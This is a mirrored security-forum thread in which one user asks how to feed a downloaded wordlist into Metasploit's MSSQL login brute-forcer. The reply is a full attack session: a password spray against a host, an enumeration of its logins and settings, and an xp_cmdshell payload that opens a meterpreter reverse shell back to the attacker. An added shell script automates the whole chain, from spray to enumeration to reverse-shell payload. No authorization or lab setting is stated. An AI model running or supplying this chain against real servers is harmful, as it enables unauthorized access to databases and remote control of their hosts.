BBYR Achieve
This is a mirrored post. Source: 北邮人论坛 / security / #34510, synced on 2012/6/20

Help with a Metasploit question

huangzz
2012/6/20 (mirror sync) · 2 replies
I just wanted to brute-force an MSSQL login password with mssql_login, but it turns out there is no dictionary shipped with it. I downloaded a wordlist.txt from the web but don't know how to use it. Could someone who knows give me some pointers?

2 replies
Xsetc #1 · 2012/6/22
[code=bash]
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

       Name: MSSQL Login Utility
    Version: 7185
    License: Metasploit Framework License (BSD)

Provided by:
  MC <mc@metasploit.com>

Basic options:
  Name             Current Setting                                                     Required  Description
  ----             ---------------                                                     --------  -----------
  HEX2BINARY       /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
  MSSQL_PASS                                                                           no        The password for the specified username
  MSSQL_PASS_FILE                                                                      no        A dictionary of passwords to perform a bruteforce attempt
  MSSQL_USER       sa                                                                  no        The username to authenticate as
  RHOSTS                                                                               yes       The target address range or CIDR identifier
  RPORT            1433                                                                yes       The target port
  THREADS          1                                                                   yes       The number of concurrent threads

Description:
  This module simply queries the MSSQL instance for a specific user/pass
  (default is sa with blank).

msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/password.txt
MSSQL_PASS_FILE => /tmp/password.txt
msf auxiliary(mssql_login) > set RHOSTS 10.6.21.200
RHOSTS => 10.6.21.200
msf auxiliary(mssql_login) > run

[*] 10.6.21.200:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > info

       Name: Microsoft SQL Server Configuration Enumerator
    Version: 7226
    License: Metasploit Framework License (BSD)

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Basic options:
  Name        Current Setting                                                     Required  Description
  ----        ---------------                                                     --------  -----------
  HEX2BINARY  /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
  MSSQL_PASS                                                                      no        The password for the specified username
  MSSQL_USER  sa                                                                  no        The username to authenticate as
  RHOST                                                                           yes       The target address
  RPORT       1433                                                                yes       The target port

Description:
  This module will perform a series of configuration audits and security
  checks against a Microsoft SQL Server database. For this module to work,
  valid administrative user credentials must be supplied.

msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 10.6.21.200
RHOST => 10.6.21.200
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]	Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*]		Jun 22 2012 12:43:34
[*]		Copyright (c) 1988-2012 Microsoft Corporation
[*]		Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*]	C2 Audit Mode is Not Enabled
[*]	xp_cmdshell is Enabled
[*]	remote access is Enabled
[*]	allow updates is Not Enabled
[*]	Database Mail XPs is Not Enabled
[*]	Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*]	Database name:master
[*]	Databse Files for master:
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*]	Database name:tempdb
[*]	Databse Files for tempdb:
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*]	Database name:model
[*]	Databse Files for model:
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*]	Database name:msdb
[*]	Databse Files for msdb:
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*]		C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*]	sa
[*]	##MS_SQLResourceSigningCertificate##
[*]	##MS_SQLReplicationSigningCertificate##
[*]	##MS_SQLAuthenticatorCertificate##
[*]	##MS_PolicySigningCertificate##
[*]	##MS_PolicyEventProcessingLogin##
[*]	##MS_PolicyTsqlExecutionLogin##
[*]	##MS_AgentSigningCertificate##
[*]	NT AUTHORITY\SYSTEM
[*]	NT AUTHORITY\NETWORK SERVICE
[*]	DBSQL2K801\Administrator
[*]	dangerlogin
[*]	meta
[*] Disabled Accounts:
[*]	sa
[*]	##MS_PolicyEventProcessingLogin##
[*]	##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*]	dangerlogin
[*]	meta
[*] Password Expiration is not checked for:
[*]	sa
[*]	##MS_PolicyEventProcessingLogin##
[*]	##MS_PolicyTsqlExecutionLogin##
[*]	dangerlogin
[*]	meta
[*] System Admin Logins on this Server:
[*]	sa
[*]	NT AUTHORITY\SYSTEM
[*]	NT AUTHORITY\NETWORK SERVICE
[*]	DBSQL2K801\Administrator
[*]	meta
[*] Windows Logins on this Server:
[*]	NT AUTHORITY\SYSTEM
[*]	NT AUTHORITY\NETWORK SERVICE
[*]	DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*]	No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*]	meta
[*] Accounts with empty password:
[*]	No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*]	sp_replsetsyncstatus
[*]	sp_replcounters
[*]	sp_replsendtoqueue
[*]	sp_resyncexecutesql
[*]	sp_prepexecrpc
[*]	sp_repltrans
[*]	sp_xml_preparedocument
[*]	xp_qv
[*]	xp_getnetname
[*]	sp_releaseschemalock
[*]	sp_refreshview
[*]	sp_replcmds
[*]	sp_unprepare
[*]	sp_resyncprepare
[*]	sp_createorphan
[*]	xp_dirtree
[*]	sp_replwritetovarbin
[*]	sp_replsetoriginator
[*]	sp_xml_removedocument
[*]	sp_repldone
[*]	sp_reset_connection
[*]	xp_fileexist
[*]	xp_fixeddrives
[*]	sp_getschemalock
[*]	sp_prepexec
[*]	xp_revokelogin
[*]	sp_resyncuniquetable
[*]	sp_replflush
[*]	sp_resyncexecute
[*]	xp_grantlogin
[*]	sp_droporphans
[*]	xp_regread
[*]	sp_getbindtoken
[*]	sp_replincrementlsn
[*] Instances found on this server:
[*]	MSSQLSERVER
[*]	TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]	NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*]	LocalSystem
[*] Auxiliary module execution completed

msf exploit(mssql_payload) > info

       Name: Microsoft SQL Server Payload Execution
    Version: 7236
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  David Kennedy "ReL1K" <kennedyd013@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                                                     Required  Description
  ----        ---------------                                                     --------  -----------
  HEX2BINARY  /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
  MSSQL_PASS                                                                      no        The password for the specified username
  MSSQL_USER  sa                                                                  no        The username to authenticate as
  RHOST                                                                           yes       The target address
  RPORT       1433                                                                yes       The target port

Payload information:

Description:
  This module will execute an arbitrary payload on a Microsoft SQL Server,
  using the Windows debug.com method for writing an executable to disk and
  the xp_cmdshell stored procedure. File size restrictions are avoided by
  incorporating the debug bypass method presented at Defcon 17 by
  SecureState. Note that this module will leave a metasploit payload in the
  Windows System32 directory which must be manually deleted once the attack
  is completed.

References:
  http://www.osvdb.org/557
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
  http://www.securityfocus.com/bid/1281
  http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.6.21.102
LHOST => 10.6.21.102
msf exploit(mssql_payload) > set RHOST 10.6.21.200
RHOST => 10.6.21.200
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.6.21.102:4444 -> 10.6.21.200:1708)

meterpreter > sysinfo
Computer: DBSQL2K801
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >
[/code]

【 huangzz wrote: 】
: I just wanted to brute-force an MSSQL login password with mssql_login, but it turns out there is no dictionary shipped with it.
: I downloaded a wordlist.txt from the web but don't know how to use it. Could someone who knows give me some pointers?
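The session above runs three modules by hand: mssql_login with a password file, mssql_enum with the password that worked, then mssql_payload over xp_cmdshell. The added helper below (editor's example, not code from the thread or from Metasploit) does two things that trip people up in practice: it cleans a wordlist downloaded through a Windows browser (CRLF endings, a UTF-8 BOM, blank and trailing-space lines, each of which turns every guess into a wrong guess or makes the file unusable) and writes an msfconsole resource script for the same chain. The hosts, user, file paths and the sample wordlist are placeholders/constructed input, not the thread's real targets. Option names follow the module version shown in the post; on current Metasploit the wordlist option of mssql_login is PASS_FILE and the exploit's full path is exploit/windows/mssql/mssql_payload, as used in the script.

```shell
#!/bin/sh
# Editor's example for this thread, not code from the original post or from
# the Metasploit project. Two helpers:
#   normalize_wordlist SRC DST              clean a wordlist, print usable line count
#   write_msf_rc RC RHOST LHOST USER PFILE [PASS]   write an msfconsole resource script
# Assumption: the wordlist came from a Windows download and may carry CRLF
# line endings, a UTF-8 BOM, blank lines and trailing whitespace. Hosts, the
# user name and paths are whatever the caller passes in (placeholders).

# Strip BOM, CR, trailing whitespace and blank lines; drop duplicate entries
# while keeping first-seen order (a deterministic order keeps the attempt log
# reproducible). Prints the number of usable candidates so an empty or
# mangled download is caught before any login attempt is made.
normalize_wordlist() {
    src=$1
    dst=$2
    bom=$(printf '\357\273\277')          # the three bytes of a UTF-8 BOM
    sed -e "1s/^$bom//" "$src" \
      | tr -d '\r' \
      | sed -e 's/[[:space:]]*$//' \
      | grep -v '^$' \
      | awk '!seen[$0]++' > "$dst"
    wc -l < "$dst" | tr -d ' '
}

# Emit a resource script. Without PASS it only sprays the wordlist against one
# login; with PASS it also runs the configuration audit and the xp_cmdshell
# payload with that credential, mirroring the manual session above.
write_msf_rc() {
    rc=$1; rhost=$2; lhost=$3; user=$4; pfile=$5; pass=${6:-}
    {
        echo "# step 1: try every cleaned candidate against one login"
        echo "use auxiliary/scanner/mssql/mssql_login"
        echo "set RHOSTS $rhost"
        echo "set MSSQL_USER $user"
        echo "set MSSQL_PASS_FILE $pfile"
        echo "run"
        if [ -n "$pass" ]; then
            echo "# step 2: configuration audit with the password that worked"
            echo "use auxiliary/admin/mssql/mssql_enum"
            echo "set RHOST $rhost"
            echo "set MSSQL_USER $user"
            echo "set MSSQL_PASS $pass"
            echo "run"
            echo "# step 3: payload via xp_cmdshell; the module leaves an .exe in"
            echo "# the server's %TEMP%, remove it when the engagement is over"
            echo "use exploit/windows/mssql/mssql_payload"
            echo "set PAYLOAD windows/meterpreter/reverse_tcp"
            echo "set LHOST $lhost"
            echo "set RHOST $rhost"
            echo "set MSSQL_USER $user"
            echo "set MSSQL_PASS $pass"
            echo "exploit -z"
        fi
    } > "$rc"
}
```

Source the file, run `normalize_wordlist wordlist.txt /tmp/password.txt` and check that the printed count is not zero, then `write_msf_rc spray.rc <rhost> <lhost> meta /tmp/password.txt` and `msfconsole -r spray.rc`. Pass an absolute path for the wordlist: msfconsole resolves MSSQL_PASS_FILE relative to its own working directory, not yours. Once the spray reports a working password, call `write_msf_rc` again with it as the sixth argument to get the enum and payload steps.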
huangzz #2 · 2012/6/23
【 Xsetc wrote: 】
: [code=bash]
: msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
: msf auxiliary(mssql_login) > info
: ...................
After I downloaded password.txt, set the path and ran it, it kept telling me the password dictionary was unavailable (I forget the exact wording, but that was the gist). Where did you download your password.txt from? I got mine from 新浪资料 (Sina's file share).